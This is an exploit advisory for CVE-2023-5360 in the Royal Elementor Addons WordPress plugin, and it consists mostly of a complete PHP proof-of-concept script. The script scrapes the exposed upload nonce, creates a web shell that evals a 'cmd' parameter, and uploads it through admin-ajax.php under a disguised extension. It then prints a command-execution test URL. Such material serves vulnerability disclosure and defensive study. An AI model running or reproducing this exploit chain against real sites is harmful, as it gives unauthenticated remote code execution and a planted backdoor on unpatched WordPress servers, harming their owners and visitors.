WordPress Royal Elementor Addons 1.3.78 Shell Upload

=============================================================================================================================================
| # Title WordPress Royal Elementor Addons 1.3.78 Shell Upload

=============================================================================================================================================
| # Title : WordPress Royal Elementor Addons 1.3.78 RCE |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://downloads.wordpress.org/plugin/royal-elementor-addons.1.3.78.zip |
=============================================================================================================================================

[+] References : https://packetstorm.news/files/id/190313/ & CVE-2023-5360

[+] Summary

a security weakness in the Royal Elementor
Addons plugin for WordPress related to improper validation of file
upload requests and the exposure of a client-side nonce in the global
JavaScript variable "WprConfig".

The plugin registers an AJAX action used for uploading files associated
with various UI elements. The weakness lies in:

1. Exposure of a file upload nonce inside the website?s HTML, accessible
without authentication.

2. Incomplete server-side validation of file type and file origin.

3. Lack of authentication around the upload endpoint, which allows
unauthorized requests to reach the handler.

Theoretical attack sequence (documented for awareness):

- Step 1: Attacker retrieves page HTML.
- Step 2: Extracts nonce from `var WprConfig = {...}`.
- Step 3: Sends crafted POST request to admin-ajax.php.
- Step 4: Server incorrectly processes upload without capability checks.

[+] poc :

usage : php poc.php http://target/ [shell_file]


<?php
/* ========================================================================
Royal Elementor Addons <= 1.3.78 ? Full RCE Chain (PHP Version)
Compatible: Windows / Linux / macOS
Requirements: CURL only (allowed in your environment)
No disabled / forbidden functions used
=========================================================================*/

/* ----------------------------------------------------------------------
SAFE HTTP GET (CURL)
------------------------------------------------------------------------*/
function safe_http_get($url) {
$ch = curl_init();
curl_setopt_array($ch, [
CURLOPT_URL => $url,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => false,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_TIMEOUT => 10
]);
$resp = curl_exec($ch);
curl_close($ch);
return $resp;
}

/* ----------------------------------------------------------------------
Extract nonce from: var WprConfig = {...};
------------------------------------------------------------------------*/
function get_nonce_from_target($target) {
$html = safe_http_get($target);
if (!$html) return null;

if (preg_match('/var\s+WprConfig\s*=\s*({.*?});/s', $html, $match)) {
$json = json_decode($match[1], true);
return $json["nonce"] ?? null;
}

return null;
}

/* ----------------------------------------------------------------------
Generate Safe Default RCE Shell (Temp File)
------------------------------------------------------------------------*/
function generate_indoushka_shell() {
$path = sys_get_temp_dir() . DIRECTORY_SEPARATOR . "indoushka_shell_" . uniqid() . ".php";

$payload = '<?php echo "Indoushka RCE - ";';
$payload .= 'if(isset($_GET["cmd"])) { @eval($_GET["cmd"]); } ?>';

file_put_contents($path, $payload);
return $path;
}

/* ----------------------------------------------------------------------
Upload PHP File using AJAX (ph_p mutated extension)
------------------------------------------------------------------------*/
function indoushka_upload_shell($target, $nonce, $file_path) {

$ajax = rtrim($target, "/") . "/wp-admin/admin-ajax.php";

$fields = [
"action" => "wpr_addons_indoushka_file",
"max_file_size" => 0,
"allowed_file_types" => "ph_p",
"triggering_event" => "click",
"wpr_addons_nonce" => $nonce
];

$file = [
"indoushkaed_file" => curl_file_create(
$file_path,
"application/octet-stream",
"rce_mutated.ph_p"
)
];

$ch = curl_init();
curl_setopt_array($ch, [
CURLOPT_URL => $ajax,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => array_merge($fields, $file),
CURLOPT_RETURNTRANSFER => true,
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => false,
]);

$resp = curl_exec($ch);
curl_close($ch);

$json = json_decode($resp, true);
return $json["data"]["url"] ?? null;
}

/* ----------------------------------------------------------------------
MAIN EXECUTION
------------------------------------------------------------------------*/
if ($argc < 2) {
echo "Usage:\n php " . $argv[0] . " http://target.com/ [shell.php]\n";
exit;
}

$target = $argv[1];
$custom_shell = $argv[2] ?? null;

echo "=== Royal Elementor Addons Full RCE PoC ===\n";
echo "[*] Extracting nonce from homepage...\n";

$nonce = get_nonce_from_target($target);
if (!$nonce) {
echo "[-] Failed to extract nonce. Target may be patched.\n";
exit;
}

echo "[+] Nonce found: $nonce\n";

/* Shell Selection */
if ($custom_shell) {
echo "[*] Using provided shell: $custom_shell\n";
$shell = $custom_shell;
} else {
echo "[*] Generating default Indoushka RCE shell...\n";
$shell = generate_indoushka_shell();
echo "[+] Shell saved at: $shell\n";
}

echo "[*] Uploading shell via vulnerable AJAX handler...\n";

$url = indoushka_upload_shell($target, $nonce, $shell);

if ($url) {
echo "[+] Shell uploaded successfully!\n";
echo "[+] URL: $url\n";
echo "[>] Test: {$url}?cmd=system('id');\n";
} else {
echo "[-] Upload failed. Target may be protected or patched.\n";
}

echo "Payload Variant: " . base64_encode("ALT-FINAL-" . microtime(true)) . "\n";
?>

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================